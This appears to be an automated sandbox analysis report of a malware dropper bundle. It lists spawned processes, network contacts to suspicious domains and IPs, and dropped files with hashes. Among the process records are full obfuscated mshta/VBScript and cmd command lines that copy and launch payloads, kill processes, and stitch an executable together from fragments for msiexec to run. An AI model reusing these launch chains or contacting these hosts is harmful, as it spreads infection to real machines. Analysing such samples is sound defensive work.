C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed220fb9dde4.exe

Wed220fb9dde4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe

Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe

Wed22988be99e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed227d9e0c1976ea6dc.exe

Wed227d9e0c1976ea6dc.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22293324c9c.exe

Wed22293324c9c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe

Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe

Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\is-JO1SS.tmp\Wed228eebd341673e072.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JO1SS.tmp\Wed228eebd341673e072.tmp" /SL5="$702AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: ClOse ( creATEObjECt("WscRIpT.sHelL" ). rUn ("cmd.exe /q/c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe"" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If """" =="""" for %z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe"" ) do taskkill /f /IM ""%~nxz"" " , 0 , TRUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3824 -ip 3824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 608

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q/c Copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If "" =="" for %z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe" ) do taskkill /f /IM "%~nxz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5008 -ip 5008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 360

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe

RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Wed22168eb266d7a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: ClOse ( creATEObjECt("WscRIpT.sHelL" ). rUn ("cmd.exe /q/c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe"" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If ""-PDOY18jViAcX9ec2G1idjTy2VmsYG "" =="""" for %z IN ( ""C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe"" ) do taskkill /f /IM ""%~nxz"" " , 0 , TRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q/c Copy /Y "C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If "-PDOY18jViAcX9ec2G1idjTy2VmsYG " =="" for %z IN ( "C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe" ) do taskkill /f /IM "%~nxz"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBScrIPT: Close ( cReATEOBjECt ( "wSCRipt.SHell"). rUn ( "cMD.exe /Q /C ecHO | seT /P = ""MZ"" > GSbPj.qVp & copy /B /Y GSBPj.qVP +NGSPtE2.3uY + O99N0.MK + Umd2y.O + 7BHI9XPY.U +JCHs.E3 M4WXZZ.Y & StARt msiexec.exe /y .\M4WxZZ.Y " , 0 , tRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C ecHO | seT /P = "MZ" > GSbPj.qVp & copy /B /Y GSBPj.qVP +NGSPtE2.3uY + O99N0.MK +Umd2y.O + 7BHI9XPY.U +JCHs.E3 M4WXZZ.Y & StARt msiexec.exe /y .\M4WxZZ.Y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>GSbPj.qVp"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\M4WxZZ.Y

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 propanla.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 gcl-gb.biz udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:50266 tcp
N/A 127.0.0.1:50269 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 r11.o.lencr.org udp
IE 2.18.24.19:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 163.169.246.72.in-addr.arpa udp
US 8.8.8.8:53 19.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\setup_install.exe

MD5 9bd48b88b9a6aa6b854ee78d989ab074
SHA1 a80dee556656d0b79fe7ac79586a271663e567ee
SHA256 c06eda92e55652011e2285c576f89d223f3f28719e2eeefa2c117059fdce9e22
SHA512 46e4e9430bdf3743b3959a410509036513b8a7b65ee9fafcff174d5469c7de3f318022f11ac6d5d7efcb6067074c912a198c1ad5e38fc87a3482d68d91b6c316

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3824-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3824-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3824-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3824-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3824-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3824-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3824-62-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3824-61-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3824-60-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3824-59-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3824-58-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3824-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3824-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3824-68-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2255741b48dffd.exe

MD5 d75800977e3ec3199509eb2e0a6a28f5
SHA1 3edc49c3a466f3bbc977c42406fbd5c90d49e462
SHA256 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b
SHA512 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed220fb9dde4.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22ac1480b8.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22988be99e.exe

MD5 f762e5f3316af686ea906f77787e9a1d
SHA1 09e60c8af577d5753121254663b85bbb7dfc638f
SHA256 557e0a9b0fd9c188589502ef21bea156733ad1bfead7551939e03b4412e2688d
SHA512 e49f1fdb55dbf9aec94ac581746adcd74ae99ee3698a49c377b8d7c2016662c90b89e3d8bb5494e7e5a95d073c35b4829fdc6cb896645de15488bcabb46f4a33

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed2235e1e9c9640.exe

MD5 dd67bc52c4a358f3f9fe5f1e37e9a989
SHA1 48d29006637f5f371866c1410bd704e297b79a0b
SHA256 2b16c77f19b87c5d055e4c8a3eb28ecfd0f64c5ced106298e8602a6cdeaa011c
SHA512 2d1eded3db08cfd2fa1599b3976142e63ccfaf94858a7b53efb37b6fec8a17ada0888bdf3f46ce58e1a3cf359d8442c159ad93527e736375bc25c4ea07afdc9b

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed227d9e0c1976ea6dc.exe

MD5 74e0cb0402a028b086538805ab1b0c2b
SHA1 3d78a24bd8d720a017357e5ff195e961756c8b6c
SHA256 6c801bd308d7c4fee852e854d07869e188fb4bc8cd903515db7d2591c9855a75
SHA512 0b9b7c0c602495a685b824289243068f744377681364ecbf18ca2fecbfd8f9964cefccdf9af7820035245437eeae1dcb80e067862ce22ee0b741f2fee18dfb30

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22269ff37e.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed228eebd341673e072.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22d8c4cdc4a5a.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1600-87-0x0000000000400000-0x0000000000414000-memory.dmp

memory/556-86-0x0000000004F60000-0x0000000005588000-memory.dmp

memory/2596-83-0x0000000002540000-0x0000000002576000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed224fff3f809a1.exe

MD5 a02438d946903f95bd9f706ad0776c86
SHA1 d4b9470f0d24d94e3d327a456cb98fddd8fe61b4
SHA256 d24b5d75e56e99a246697efda3cf47ff9f1b841aaabb06f987804c02e83f5e0a
SHA512 b4301d4ea11f58bb8d6aae4326838ecbb558b485973e6d52553902a1d2a64217f69956a61470a7956513db904ffd2b1fc8ee55386cc02a4895e758d978ce52b4

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22293324c9c.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22add6199f.exe

MD5 fbf57ae8dbbb3084f998593061db2c5b
SHA1 0fb6712de7f6bc717af53fadbfa1234eec3f945d
SHA256 a8a5c94fd4826912cccf85b556621bd6e39915d79495e2cef843ef6913ce3041
SHA512 660781340cebdc420ebe9d42dd9a5fedb081dcdc4cf8341d85182e85f8b6b358c886a7e52427ca3345e3dadef1a2173abc8427e01d5faa287674d2417898a930

C:\Users\Admin\AppData\Local\Temp\7zSC4C0FC37\Wed22168eb266d7a.exe

MD5 b7f0edadd7158822a222455fb8d7263d
SHA1 6fcb1b9e6b18afda8f14b57018e6a4f8cbca5442
SHA256 63ed58192e6acc9b2f67b7d5f6c23c2b573a23e9be6cdfc79cceefaeb23c128a
SHA512 1a70e3b84596c0098936a8b2c7cbbd013d380b7357f7dc9d7191c6644ea8a028d638da23f710361dd59c55e8fb1ef0d120abde1dc99f1310f43eff8f4c68657a

C:\Users\Admin\AppData\Local\Temp\is-VQR7K.tmp\Wed228eebd341673e072.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1588-115-0x00000000053B0000-0x0000000005426000-memory.dmp

memory/1588-114-0x0000000000C80000-0x0000000000CF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-P8JU2.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2396-102-0x00000000006C0000-0x00000000006C8000-memory.dmp

memory/868-101-0x0000000000300000-0x0000000000318000-memory.dmp

memory/2596-123-0x00000000053E0000-0x0000000005402000-memory.dmp

memory/2596-125-0x00000000054F0000-0x0000000005556000-memory.dmp

memory/2596-130-0x0000000005660000-0x00000000059B4000-memory.dmp

memory/1588-129-0x0000000005550000-0x000000000556E000-memory.dmp

memory/1412-127-0x0000000000A00000-0x0000000000A70000-memory.dmp

memory/4680-126-0x00000000004E0000-0x0000000000550000-memory.dmp

memory/2596-124-0x0000000005480000-0x00000000054E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5h3dbrt.lge.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/868-117-0x00000000024E0000-0x00000000024E6000-memory.dmp

memory/4680-150-0x0000000005420000-0x00000000059C4000-memory.dmp

memory/3196-151-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1600-155-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-87323.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4440-147-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2596-165-0x00000000059E0000-0x00000000059FE000-memory.dmp

memory/556-166-0x0000000005EB0000-0x0000000005EFC000-memory.dmp

memory/3824-171-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3824-167-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3824-176-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3824-175-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3824-174-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3824-173-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed22add6199f.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/3796-179-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3796-187-0x00000000053B0000-0x00000000054BA000-memory.dmp

memory/3796-190-0x00000000052E0000-0x000000000531C000-memory.dmp

memory/4100-189-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3796-184-0x0000000005240000-0x0000000005252000-memory.dmp

memory/3796-183-0x0000000005860000-0x0000000005E78000-memory.dmp

memory/5008-194-0x0000000000400000-0x0000000002F01000-memory.dmp

memory/2596-207-0x0000000006AE0000-0x0000000006AFE000-memory.dmp

memory/2596-197-0x000000006D060000-0x000000006D0AC000-memory.dmp

memory/2596-196-0x0000000006B00000-0x0000000006B32000-memory.dmp

memory/2596-208-0x0000000006E00000-0x0000000006EA3000-memory.dmp

memory/556-209-0x000000006D060000-0x000000006D0AC000-memory.dmp

memory/556-219-0x0000000007780000-0x0000000007DFA000-memory.dmp

memory/2596-220-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

memory/2596-221-0x0000000006F10000-0x0000000006F1A000-memory.dmp

memory/2596-222-0x0000000007100000-0x0000000007196000-memory.dmp

memory/556-223-0x0000000007340000-0x0000000007351000-memory.dmp

memory/2596-234-0x00000000070C0000-0x00000000070CE000-memory.dmp

memory/2596-235-0x00000000070D0000-0x00000000070E4000-memory.dmp

memory/556-236-0x0000000007470000-0x000000000748A000-memory.dmp

memory/556-237-0x0000000007460000-0x0000000007468000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ff01dd86fddd23fa31cb695a731c2ba
SHA1 8953081f7f49e2926ecef90e112b42b9ea140a37
SHA256 25d7f62ae3a4d5c6be3ff7989bfa9cfa878d5c83717c2c671c561f009f2968d5
SHA512 fd2dd24f0cbdbb9312287fe5f2f5936a0ac5dbf9705f1c857710a8283c9ff882a5f3d8ceb4fdb62510fc6d09c08f18ad05b83f9e74ba18e4b0ecdee74c76db23

C:\Users\Admin\AppData\Local\Temp\nGSPte2.3uY

MD5 0e794635fe380bf7013975be43e6328d
SHA1 dbc56e900a0908fcbb8b92625707d639a2913013
SHA256 4becf7472a4dab6773d38b7c0909e5cd8475d7d2ee069e29d1dd1e277da6d996
SHA512 2cec777557f5126dae3cd58ac2f5535ab3b6495ae97617d8132de8a8478efaad78b27383f197890b9117f8979fd145bdd1801a9068779ca8ab2ff416c898ffd5

C:\Users\Admin\AppData\Local\Temp\GSbPj.qVp

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

